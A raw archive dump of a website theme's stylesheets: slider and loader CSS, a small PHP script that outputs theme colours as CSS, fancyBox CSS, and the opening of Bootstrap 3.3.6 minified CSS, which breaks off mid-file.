.tparrows.preview4:after				{	transform-origin: 100% 100%; -webkit-transform-origin: 100% 100%}
.tp-leftarrow.preview4:after			{	transform-origin: 0% 0%; -webkit-transform-origin: 0% 0%}




@media only screen and (min-width: 768px)  {
		.tparrows.preview4:hover:after				{	-webkit-transform: rotateY(-90deg); transform:rotateY(-90deg)}
		.tp-leftarrow.preview4:hover:after			{	-webkit-transform: rotateY(90deg); transform:rotateY(90deg)}


		.tparrows.preview4:hover .tp-arr-titleholder	{	-webkit-transition-delay: 0.4s;
															transition-delay: 0.4s;
															-webkit-transform: rotateX(0deg);
															transform: rotateX(0deg);
															-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1;

														}
}

/* PREVIEW 4 BULLETS */

.tp-bullets.preview4 						{ 	height: 17px}
.tp-bullets.preview4 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.5) !important;
											    -webkit-border-radius: 10px;
											    border-radius: 10px;
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 2px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview4 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview4 .bullet:hover,
.tp-bullets.preview4 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: rgba(255, 255, 255, 1) !important;
												width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 1) !important;
}


    @media only screen  and (max-width: 767px) {
   		 .tparrows.preview4 						{	width:20px; height:80px}
   		 .tparrows.preview4:after					{	width:20px; height:80px; line-height:80px; font-size:14px}

   		 .tparrows.preview1 .tp-arr-allwrapper,
   		 .tparrows.preview2 .tp-arr-allwrapper,
   		 .tparrows.preview3 .tp-arr-allwrapper,
   		 .tparrows.preview4 .tp-arr-allwrapper		{	display: none !important}
    }



/******************************
	-	LOADER FORMS	-
********************************/

.tp-loader 	{
				top:50%; left:50%;
				z-index:10000;
				position:absolute;


			}

.tp-loader.spinner0 {
  width: 40px;
  height: 40px;
  /*background:url(../assets/loader.gif) no-repeat center center;*/
  background-color: #fff;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  margin-top:-20px;
  margin-left:-20px;
  -webkit-animation: tp-rotateplane 1.2s infinite ease-in-out;
  animation: tp-rotateplane 1.2s infinite ease-in-out;
  border-radius: 3px;
	-moz-border-radius: 3px;
	-webkit-border-radius: 3px;
}


.tp-loader.spinner1 {
  width: 40px;
  height: 40px;
  background-color: #fff;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  margin-top:-20px;
  margin-left:-20px;
  -webkit-animation: tp-rotateplane 1.2s infinite ease-in-out;
  animation: tp-rotateplane 1.2s infinite ease-in-out;
  border-radius: 3px;
	-moz-border-radius: 3px;
	-webkit-border-radius: 3px;
}



.tp-loader.spinner5 	{	background:url(../assets/loader.gif) no-repeat 10px 10px;
							background-color:#fff;
							margin:-22px -22px;
							width:44px;height:44px;
							border-radius: 3px;
							-moz-border-radius: 3px;
							-webkit-border-radius: 3px;
						}


@-webkit-keyframes tp-rotateplane {
  0% { -webkit-transform: perspective(120px) }
  50% { -webkit-transform: perspective(120px) rotateY(180deg) }
  100% { -webkit-transform: perspective(120px) rotateY(180deg)  rotateX(180deg) }
}

@keyframes tp-rotateplane {
  0% {
    transform: perspective(120px) rotateX(0deg) rotateY(0deg);
    -webkit-transform: perspective(120px) rotateX(0deg) rotateY(0deg)
  } 50% {
    transform: perspective(120px) rotateX(-180.1deg) rotateY(0deg);
    -webkit-transform: perspective(120px) rotateX(-180.1deg) rotateY(0deg)
  } 100% {
    transform: perspective(120px) rotateX(-180deg) rotateY(-179.9deg);
    -webkit-transform: perspective(120px) rotateX(-180deg) rotateY(-179.9deg);
  }
}


.tp-loader.spinner2 {
  width: 40px;
  height: 40px;
  margin-top:-20px;margin-left:-20px;
  background-color: #ff0000;
   box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  border-radius: 100%;
  -webkit-animation: tp-scaleout 1.0s infinite ease-in-out;
  animation: tp-scaleout 1.0s infinite ease-in-out;
}

@-webkit-keyframes tp-scaleout {
  0% { -webkit-transform: scale(0.0) }
  100% {
    -webkit-transform: scale(1.0);
    opacity: 0;
  }
}

@keyframes tp-scaleout {
  0% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 100% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
    opacity: 0;
  }
}




.tp-loader.spinner3 {
  margin: -9px 0px 0px -35px;
  width: 70px;
  text-align: center;

}

.tp-loader.spinner3 .bounce1,
.tp-loader.spinner3 .bounce2,
.tp-loader.spinner3 .bounce3 {
  width: 18px;
  height: 18px;
  background-color: #fff;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  border-radius: 100%;
  display: inline-block;
  -webkit-animation: tp-bouncedelay 1.4s infinite ease-in-out;
  animation: tp-bouncedelay 1.4s infinite ease-in-out;
  /* Prevent first frame from flickering when animation starts */
  -webkit-animation-fill-mode: both;
  animation-fill-mode: both;
}

.tp-loader.spinner3 .bounce1 {
  -webkit-animation-delay: -0.32s;
  animation-delay: -0.32s;
}

.tp-loader.spinner3 .bounce2 {
  -webkit-animation-delay: -0.16s;
  animation-delay: -0.16s;
}

@-webkit-keyframes tp-bouncedelay {
  0%, 80%, 100% { -webkit-transform: scale(0.0) }
  40% { -webkit-transform: scale(1.0) }
}

@keyframes tp-bouncedelay {
  0%, 80%, 100% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 40% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
  }
}




.tp-loader.spinner4 {
  margin: -20px 0px 0px -20px;
  width: 40px;
  height: 40px;
  text-align: center;
  -webkit-animation: tp-rotate 2.0s infinite linear;
  animation: tp-rotate 2.0s infinite linear;
}

.tp-loader.spinner4 .dot1,
.tp-loader.spinner4 .dot2 {
  width: 60%;
  height: 60%;
  display: inline-block;
  position: absolute;
  top: 0;
  background-color: #fff;
  border-radius: 100%;
  -webkit-animation: tp-bounce 2.0s infinite ease-in-out;
  animation: tp-bounce 2.0s infinite ease-in-out;
  box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
  -webkit-box-shadow: 0px 0px 20px 0px rgba(0,0,0,0.15);
}

.tp-loader.spinner4 .dot2 {
  top: auto;
  bottom: 0px;
  -webkit-animation-delay: -1.0s;
  animation-delay: -1.0s;
}

@-webkit-keyframes tp-rotate { 100% { -webkit-transform: rotate(360deg) }}
@keyframes tp-rotate { 100% { transform: rotate(360deg); -webkit-transform: rotate(360deg) }}

@-webkit-keyframes tp-bounce {
  0%, 100% { -webkit-transform: scale(0.0) }
  50% { -webkit-transform: scale(1.0) }
}

@keyframes tp-bounce {
  0%, 100% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 50% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
  }
}



.tp-transparentimg {	content:"url(../assets/transparent.png)"}
.tp-3d				{	-webkit-transform-style: preserve-3d;
						 -webkit-transform-origin: 50% 50%;
					}



.tp-caption img {
background: transparent;
-ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#00FFFFFF,endColorstr=#00FFFFFF)";
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#00FFFFFF,endColorstr=#00FFFFFF);
zoom: 1;
}


@font-face {
  font-family: 'revicons';
  src: url('../font/revicons.eot?5510888');
  src: url('../font/revicons.eot?5510888#iefix') format('embedded-opentype'),
       url('../font/revicons.woff?5510888') format('woff'),
       url('../font/revicons.ttf?5510888') format('truetype'),
       url('../font/revicons.svg?5510888#revicons') format('svg');
  font-weight: normal;
  font-style: normal;
}
/* Chrome hack: SVG is rendered more smooth in Windozze. 100% magic, uncomment if you need it. */
/* Note, that will break hinting! In other OS-es font will be not as sharp as it could be */
/*
@media screen and (-webkit-min-device-pixel-ratio:0) {
  @font-face {
    font-family: 'revicons';
    src: url('../font/revicons.svg?5510888#revicons') format('svg');
  }
}
*/

 [class^="revicon-"]:before, [class*=" revicon-"]:before {
  font-family: "revicons";
  font-style: normal;
  font-weight: normal;
  speak: none;

  display: inline-block;
  text-decoration: inherit;
  width: 1em;
  margin-right: .2em;
  text-align: center;
  /* opacity: .8; */

  /* For safety - reset parent styles, that can break glyph codes*/
  font-variant: normal;
  text-transform: none;

  /* fix buttons height, for twitter bootstrap */
  line-height: 1em;

  /* Animation center compensation - margins should be symmetric */
  /* remove if not needed */
  margin-left: .2em;

  /* you can be more comfortable with increased icons size */
  /* font-size: 120%; */

  /* Uncomment for 3D effect */
  /* text-shadow: 1px 1px 1px rgba(127, 127, 127, 0.3); */
}

.revicon-search-1:before { content: '\e802'} /* '' */
.revicon-pencil-1:before { content: '\e831'} /* '' */
.revicon-picture-1:before { content: '\e803'} /* '' */
.revicon-cancel:before { content: '\e80a'} /* '' */
.revicon-info-circled:before { content: '\e80f'} /* '' */
.revicon-trash:before { content: '\e801'} /* '' */
.revicon-left-dir:before { content: '\e817'} /* '' */
.revicon-right-dir:before { content: '\e818'} /* '' */
.revicon-down-open:before { content: '\e83b'} /* '' */
.revicon-left-open:before { content: '\e819'} /* '' */
.revicon-right-open:before { content: '\e81a'} /* '' */
.revicon-angle-left:before { content: '\e820'} /* '' */
.revicon-angle-right:before { content: '\e81d'} /* '' */
.revicon-left-big:before { content: '\e81f'} /* '' */
.revicon-right-big:before { content: '\e81e'} /* '' */
.revicon-magic:before { content: '\e807'} /* '' */
.revicon-picture:before { content: '\e800'} /* '' */
.revicon-export:before { content: '\e80b'} /* '' */
.revicon-cog:before { content: '\e832'} /* '' */
.revicon-login:before { content: '\e833'} /* '' */
.revicon-logout:before { content: '\e834'} /* '' */
.revicon-video:before { content: '\e805'} /* '' */
.revicon-arrow-combo:before { content: '\e827'} /* '' */
.revicon-left-open-1:before { content: '\e82a'} /* '' */
.revicon-right-open-1:before { content: '\e82b'} /* '' */
.revicon-left-open-mini:before { content: '\e822'} /* '' */
.revicon-right-open-mini:before { content: '\e823'} /* '' */
.revicon-left-open-big:before { content: '\e824'} /* '' */
.revicon-right-open-big:before { content: '\e825'} /* '' */
.revicon-left:before { content: '\e836'} /* '' */
.revicon-right:before { content: '\e826'} /* '' */
.revicon-ccw:before { content: '\e808'} /* '' */
.revicon-arrows-ccw:before { content: '\e806'} /* '' */
.revicon-palette:before { content: '\e829'} /* '' */
.revicon-list-add:before { content: '\e80c'} /* '' */
.revicon-doc:before { content: '\e809'} /* '' */
.revicon-left-open-outline:before { content: '\e82e'} /* '' */
.revicon-left-open-2:before { content: '\e82c'} /* '' */
.revicon-right-open-outline:before { content: '\e82f'} /* '' */
.revicon-right-open-2:before { content: '\e82d'} /* '' */
.revicon-equalizer:before { content: '\e83a'} /* '' */
.revicon-layers-alt:before { content: '\e804'} /* '' */
.revicon-popup:before { content: '\e828'} /* '' */

	h2.tp-caption-1,
  	h2.tp-caption{
  
		font-family: "raleway";
		text-transform:none;
		font-weight: 100;
		/*font-size: 60px !important;
	  	line-height:70px!important;
	  	margin-bottom:100px!important;*/
  	}
  	p.tp-caption-1,
  	p.tp-caption{
		font-family: "raleway";
		text-transform:none;
		font-weight: 100;
		/*font-size: 30px !important;
	  	line-height:24px!important;
	  	letter-spacing:2px;*/
  	}PK!	�LUUbizone/css/color.phpnu&1i�<?php
header("Content-type: text/css; charset=Ansi");

if (!isset($_GET['main_color'])) {
	$main_color = '#07aaa5';
} else {
	$main_color = '#'.htmlspecialchars($_GET['main_color']);
}
if(!function_exists('st_hex2rgb')){
    function st_hex2rgb($hex) {
        $hex = str_replace("#", "", $hex);

        if(strlen($hex) == 3) {
            $r = hexdec(substr($hex,0,1).substr($hex,0,1));
            $g = hexdec(substr($hex,1,1).substr($hex,1,1));
            $b = hexdec(substr($hex,2,1).substr($hex,2,1));
        } else {
            $r = hexdec(substr($hex,0,2));
            $g = hexdec(substr($hex,2,2));
            $b = hexdec(substr($hex,4,2));
        }
        $rgb = array($r, $g, $b);
        //return implode(",", $rgb); // returns the rgb values separated by commas
        return $rgb; // returns an array with the rgb values
    }
}
$rgb_main = st_hex2rgb($main_color);
?>

.loader{
	background-color: <?php echo $main_color; ?> !important;
}
.sk-cube-grid .sk-cube {background-color: #fff !important;}
.bg-first {background: <?php echo $main_color; ?>;}
.bg-second {background: #b7db05;}
.bg-third {background: #bde304;}
.bg-fourth {background: #c4eb05;}
.bg-fifth {background: #ccf40b;}
.bounce-top:before {background: <?php echo $main_color; ?>;}
.bounce-top:hover, .bounce-top:focus {border: 1px solid <?php echo $main_color; ?>;}
.base_color {
  background:<?php echo $main_color; ?>;
}

.navbar-default .navbar-nav > li > a:hover, .navbar-default .navbar-nav > li > a:focus, .navbar-default .navbar-nav > .active a, .navbar-default .navbar-nav > .dropdown.active a, .navbar-default .navbar-nav > .active a:hover, .navbar-default .navbar-nav > .active a:focus {
    border-bottom: 2px solid <?php echo $main_color; ?>;
}
.navbar-nav > li > .megamenu-content li > a:hover::before {
	content: url(../images/menu-arrow-pink.png);
}
.navbar-nav > li > .megamenu-content li > a:hover, .navbar-nav > li > .megamenu-content li > a:focus, .navbar-default .navbar-nav .open .megamenu-content > li > a:hover {color: <?php echo $main_color; ?> !important;}
.navbar-nav > li > .dropdown-menu > li {border-bottom: 1px solid rgb(255, 255, 255);}

.navbar-nav > li > .dropdown-menu > li > a:focus, .navbar-nav > li > .dropdown-menu > li > a:hover, .navbar-default .navbar-nav > .active > .dropdown-menu > li > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover {background-color: <?php echo $main_color; ?>;}

.navbar-nav > li > .megamenu-content h5 {color: #000000;}
span.new {
    background: <?php echo $main_color; ?>;
    color: #fff;
    padding: 3px 10px;
    font-size: 9px;
    text-transform: uppercase;
    border-radius: 3px;
    margin: 0 0 0 10px;
}
#search .close { background-color: <?php echo $main_color; ?>; border-color: <?php echo $main_color; ?>;}
#search .btn {background-color: <?php echo $main_color; ?>;}


.icon-nav ul li a:hover{color: <?php echo $main_color; ?>;}

.cart .cart-content a {color: <?php echo $main_color; ?>;}
.certified{ background:#eaeaea;}


.main-pic .light {
  border-left: 4px solid <?php echo $main_color; ?>;
}
.main-pic .light .btn-common.active {
  background: <?php echo $main_color; ?>;
}
.index_3 .canvas-box:hover span i {
  color: <?php echo $main_color; ?>;
}
.index_3 .canvas-box:hover h4 {
  color: <?php echo $main_color; ?>;
}

.thinker-image .overlay ,.overlay {background-color: rgba(208, 37, 82, 0.71);}
.thinker-image .overlay ul.social-link li a:hover span {
  border: 1px solid transparent;
}

#testinomial-indexFour .item h4 {
  color: <?php echo $main_color; ?>;
}
#testinomial-indexFour .owl-page.active span, #testinomial-indexFour .owl-page:hover span {
  background: <?php echo $main_color; ?>;
}
.index_3 .center a,
ul.nayax-links li a:hover, ul.nayax-links li a:focus, ul.nayax-links li.active a:hover, ul.nayax-links li.active a {
  color: <?php echo $main_color; ?>;
}
.index_3 .center ul.social-link li a:hover span {background: <?php echo $main_color; ?>; border: 1px solid <?php echo $main_color; ?>;}
.index_3 .center ul.social-link li a:hover i{ color:#fff;}
.index_3 .form-inline input[type="submit"]:hover,
#testinomial-slider .owl-prev:hover, #testinomial-slider .owl-next:hover, #publication-slider .owl-prev:hover, #publication-slider .owl-next:hover, #about-slider .owl-prev:hover, #about-slider .owl-next:hover {
  background-color: <?php echo $main_color; ?>;
}
.index_3 .breadcrumb li a:hover, .index_3 .breadcrumb li a:focus {
  color: <?php echo $main_color; ?>;
}
.go-top:hover, .go-top:focus {
	color:<?php echo $main_color; ?>;
}
.navbar-default .navbar-nav li.dropdown.active > .dropdown-toggle{
	border-color:<?php echo $main_color; ?>;
}
.work-filter ul li a:hover, .work-filter ul li a.active {
    background-color: <?php echo $main_color; ?>;
    border: 1px solid <?php echo $main_color; ?>;
}PK!�77bizone/css/jquery.fancybox.cssnu&1i�/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */
.fancybox-wrap,
.fancybox-skin,
.fancybox-outer,
.fancybox-inner,
.fancybox-image,
.fancybox-wrap iframe,
.fancybox-wrap object,
.fancybox-nav,
.fancybox-nav span,
.fancybox-tmp
{
	padding: 0;
	margin: 0;
	border: 0;
	outline: none;
	vertical-align: top;
}

.fancybox-wrap {
	position: absolute;
	top: 0;
	left: 0;
	z-index: 8020;
}

.fancybox-skin {
	position: relative;
	background: #f9f9f9;
	color: #444;
	text-shadow: none;
	-webkit-border-radius: 4px;
	   -moz-border-radius: 4px;
	        border-radius: 4px;
}

.fancybox-opened {
	z-index: 8030;
}

.fancybox-opened .fancybox-skin {
	-webkit-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
	   -moz-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
	        box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
}

.fancybox-outer, .fancybox-inner {
	position: relative;
}

.fancybox-inner {
	overflow: hidden;
}

.fancybox-type-iframe .fancybox-inner {
	-webkit-overflow-scrolling: touch;
}

.fancybox-error {
	color: #444;
	font: 14px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;
	margin: 0;
	padding: 15px;
	white-space: nowrap;
}

.fancybox-image, .fancybox-iframe {
	display: block;
	width: 100%;
	height: 100%;
}

.fancybox-image {
	max-width: 100%;
	max-height: 100%;
}

#fancybox-loading, .fancybox-close, .fancybox-prev span, .fancybox-next span {
	background-image: url('../images/fancybox_sprite.png');
}

#fancybox-loading {
	position: fixed;
	top: 50%;
	left: 50%;
	margin-top: -22px;
	margin-left: -22px;
	background-position: 0 -108px;
	opacity: 0.8;
	cursor: pointer;
	z-index: 8060;
}

#fancybox-loading div {
	width: 44px;
	height: 44px;
	background: url('../images/fancybox_loading.gif') center center no-repeat;
}

.fancybox-close {
	position: absolute;
	top: -18px;
	right: -18px;
	width: 36px;
	height: 36px;
	cursor: pointer;
	z-index: 8040;
}

.fancybox-nav {
	position: absolute;
	top: 0;
	width: 40%;
	height: 100%;
	cursor: pointer;
	text-decoration: none;
	background: transparent url('blank.gif'); /* helps IE */
	-webkit-tap-highlight-color: rgba(0,0,0,0);
	z-index: 8040;
}

.fancybox-prev {
	left: 0;
}

.fancybox-next {
	right: 0;
}

.fancybox-nav span {
	position: absolute;
	top: 50%;
	width: 36px;
	height: 34px;
	margin-top: -18px;
	cursor: pointer;
	z-index: 8040;
	visibility: hidden;
}

.fancybox-prev span {
	left: 10px;
	background-position: 0 -36px;
}

.fancybox-next span {
	right: 10px;
	background-position: 0 -72px;
}

.fancybox-nav:hover span {
	visibility: visible;
}

.fancybox-tmp {
	position: absolute;
	top: -99999px;
	left: -99999px;
	visibility: hidden;
	max-width: 99999px;
	max-height: 99999px;
	overflow: visible !important;
}

/* Overlay helper */

.fancybox-lock {
    overflow: hidden !important;
    width: auto;
}

.fancybox-lock body {
    overflow: hidden !important;
}

.fancybox-lock-test {
    overflow-y: hidden !important;
}

.fancybox-overlay {
	position: absolute;
	top: 0;
	left: 0;
	overflow: hidden;
	display: none;
	z-index: 8010;
	background:rgba(0,0,0,0.9);
}

.fancybox-overlay-fixed {
	position: fixed;
	bottom: 0;
	right: 0;
}

.fancybox-lock .fancybox-overlay {
	overflow: auto;
	overflow-y: scroll;
}

/* Title helper */

.fancybox-title {
	visibility: hidden;
	font: normal 13px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;
	position: relative;
	text-shadow: none;
	z-index: 8050;
}

.fancybox-opened .fancybox-title {
	visibility: visible;
}

.fancybox-title-float-wrap {
	position: absolute;
	bottom: 0;
	right: 50%;
	margin-bottom: -35px;
	z-index: 8050;
	text-align: center;
}

.fancybox-title-float-wrap .child {
	display: inline-block;
	margin-right: -100%;
	padding: 2px 20px;
	background: transparent; /* Fallback for web browsers that doesn't support RGBa */
	background: rgba(0, 0, 0, 0.8);
	-webkit-border-radius: 15px;
	   -moz-border-radius: 15px;
	        border-radius: 15px;
	text-shadow: 0 1px 2px #222;
	color: #FFF;
	font-weight: bold;
	line-height: 24px;
	white-space: nowrap;
}

.fancybox-title-outside-wrap {
	position: relative;
	margin-top: 10px;
	color: #fff;
}

.fancybox-title-inside-wrap {
	padding-top: 10px;
}

.fancybox-title-over-wrap {
	position: absolute;
	bottom: 0;
	left: 0;
	color: #fff;
	padding: 10px;
	background: #000;
	background: rgba(0, 0, 0, .8);
}

/*Retina graphics!*/
@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
	   only screen and (min--moz-device-pixel-ratio: 1.5),
	   only screen and (min-device-pixel-ratio: 1.5){

	#fancybox-loading, .fancybox-close, .fancybox-prev span, .fancybox-next span {
		background-image: url('fancybox_sprite@2x.png');
		background-size: 44px 152px; /*The size of the normal image, half the size of the hi-res image*/
	}

	#fancybox-loading div {
		background-image: url('fancybox_loading@2x.gif');
		background-size: 24px 24px; /*The size of the normal image, half the size of the hi-res image*/
	}
}PK! �z����bizone/css/bootstrap.min.cssnu&1i�                                   /*!
 * Bootstrap v3.3.6 (http://getbootstrap.com)
 * Copyright 2011-2015 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}input{line-height:normal}input[type=checkbox],input[type=radio]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{padding:.35em .625em .75em;margin:0 2px;border:1px solid silver}legend{padding:0;border:0}textarea{overflow:auto}optgroup{font-weight:700}table{border-spacing:0;border-collapse:collapse}td,th{padding:0}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}a[href^="javascript:"]:after,a[href^="#"]:after{content:""}blockquote,pre{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.btn>.caret,.dropup>.btn>.caret{border-top-color:#000!important}.label{border:1px solid #000}.table{border-collapse:collapse!important}.table td,.table th{background-color:#fff!important}.table-bordered td,.table-bordered th{border:1px solid #ddd!important}}@font-face{font-family:'Glyphicons Halflings';src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format('embedded-opentype'),url(../fonts/glyphicons-halflings-regular.woff2) format('woff2'),url(../fonts/glyphicons-halflings-regular.woff) format('woff'),url(../fonts/glyphicons-halflings-regular.ttf) format('truetype'),url(../fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular) format('svg')}.glyphicon{position:relative;top:1px;display:inline-block;font-family:'Glyphicons Halflings';font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.glyphicon-asterisk:before{content:"\002a"}.glyphicon-plus:before{content:"\002b"}.glyphicon-eur:before,.glyphicon-euro:before{content:"\20ac"}.glyphicon-minus:before{content:"\2212"}.glyphicon-cloud:before{content:"\2601"}.glyphicon-envelope:before{content:"\2709"}.glyphicon-pencil:before{content:"\270f"}.glyphicon-glass:before{content:"\e001"}.glyphicon-music:before{content:"\e002"}.glyphicon-search:before{content:"\e003"}.glyphicon-heart:before{content:"\e005"}.glyphicon-star:before{content:"\e006"}.glyphicon-star-empty:before{content:"\e007"}.glyphicon-user:before{content:"\e008"}.glyphicon-film:before{content:"\e009"}.glyphicon-th-large:before{content:"\e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyphicon-off:before{content:"\e017"}.glyphicon-signal:before{content:"\e018"}.glyphicon-cog:before{content:"\e019"}.glyphicon-trash:before{content:"\e020"}.glyphicon-home:before{content:"\e021"}.glyphicon-file:before{content:"\e022"}.glyphicon-time:before{content:"\e023"}.glyphicon-road:before{content:"\e024"}.glyphicon-download-alt:before{content:"\e025"}.glyphicon-download:before{content:"\e026"}.glyphicon-upload:before{content:"\e027"}.glyphicon-inbox:before{content:"\e028"}.glyphicon-play-circle:before{content:"\e029"}.glyphicon-repeat:before{content:"\e030"}.glyphicon-refresh:before{content:"\e031"}.glyphicon-list-alt:before{content:"\e032"}.glyphicon-lock:before{content:"\e033"}.glyphicon-flag:before{content:"\e034"}.glyphicon-headphones:before{content:"\e035"}.glyphicon-volume-off:before{content:"\e036"}.glyphicon-volume-down:before{content:"\e037"}.glyphicon-volume-up:before{content:"\e038"}.glyphicon-qrcode:before{content:"\e039"}.glyphicon-barcode:before{content:"\e040"}.glyphicon-tag:before{content:"\e041"}.glyphicon-tags:before{content:"\e042"}.glyphicon-book:before{content:"\e043"}.glyphicon-bookmark:before{content:"\e044"}.glyphicon-print:before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-height:before{content:"\e050"}.glyphicon-text-width:before{content:"\e051"}.glyphicon-align-left:before{content:"\e052"}.glyphicon-align-center:before{content:"\e053"}.glyphicon-align-right:before{content:"\e054"}.glyphicon-align-justify:before{content:"\e055"}.glyphicon-list:before{content:"\e056"}.glyphicon-indent-left:before{content:"\e057"}.glyphicon-indent-right:before{content:"\e058"}.glyphicon-facetime-video:before{content:"\e059"}.glyphicon-picture:before{content:"\e060"}.glyphicon-map-marker:before{content:"\e062"}.glyphicon-adjust:before{content:"\e063"}.glyphicon-tint:before{content:"\e064"}.glyphicon-edit:before{content:"\e065"}.glyphicon-share:before{content:"\e066"}.glyphicon-check:before{content:"\e067"}.glyphicon-move:before{content:"\e068"}.glyphicon-step-backward:before{content:"\e069"}.glyphicon-fast-backward:before{content:"\e070"}.glyphicon-backward:before{content:"\e071"}.glyphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{content:"\e082"}.glyphicon-remove-sign:before{content:"\e083"}.glyphicon-ok-sign:before{content:"\e084"}.glyphicon-question-sign:before{content:"\e085"}.glyphicon-info-sign:before{content:"\e086"}.glyphicon-screenshot:before{content:"\e087"}.glyphicon-remove-circle:before{content:"\e088"}.glyphicon-ok-circle:before{content:"\e089"}.glyphicon-ban-circle:before{content:"\e090"}.glyphicon-arrow-left:before{content:"\e091"}.glyphicon-arrow-right:before{content:"\e092"}.glyphicon-arrow-up:before{content:"\e093"}.glyphicon-arrow-down:before{content:"\e094"}.glyphicon-share-alt:before{content:"\e095"}.glyphicon-resize-full:before{content:"\e096"}.glyphicon-resize-small:before{content:"\e097"}.glyphicon-exclamation-sign:before{content:"\e101"}.glyphicon-gift:before{content:"\e102"}.